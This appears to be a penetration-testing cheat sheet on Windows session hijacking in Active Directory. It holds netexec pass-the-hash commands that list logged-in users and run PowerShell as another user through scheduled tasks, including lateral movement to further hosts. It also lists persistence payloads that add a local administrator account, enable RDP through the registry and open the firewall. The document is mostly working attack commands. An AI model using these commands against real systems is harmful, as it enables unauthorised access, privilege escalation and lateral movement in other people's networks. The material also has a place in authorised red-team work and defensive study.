# Session Hijack

## Windows

Session hijacking in Windows is a powerfull and easy way to pivot deeper into the AD environment.

### Find logged in users

```bash
## Remotely using `netexec`
$ netexec smb <target> -u Administrator -H :<pw-hash> --local-auth --loggedon-users
...
SMB         <target>   445    <hostname>   [+] Enumerated logged_on users
SMB         <target>   445    <hostname>   DOM\username             logon_server: DC.DOM.LOCAL

## Locally using cmd/powershell
> query user /server:127.0.0.1
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 void                  console             2  Active      none   2024-10-14 07:29

> qwinsta /server:127.0.0.1
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           void                      2  Active
```

### Base command

<pre class="language-bash"><code class="lang-bash"><strong>## Execute command on target host
</strong>netexec smb &#x3C;target> -u Administrator -H :&#x3C;pw-hash> --local-auth -M schtask_as -o USER=&#x3C;user-to-hijack> CMD="powershell.exe \"&#x3C;command>\""

## Execute command on new target host
netexec smb &#x3C;target> -u Administrator -H :&#x3C;pw-hash> --local-auth -M schtask_as -o USER=&#x3C;user-to-hijack> CMD="powershell.exe \"Invoke-Command -ComputerName &#x3C;new-target-host> -ScriptBlock {&#x3C;command>}\""
</code></pre>

### Usefull payloads

```powershell
## Create new local user
net user <username> <password> /add

## Add to groups
net localgroup Administrators <username> /add
net localgroup 'Remote Desktop Users' <username> /add
net localgroup 'Remote Management Users' <username> /add

## Enable RDP
reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow
```

***

## Web

Session cookies, find them and use them.&#x20;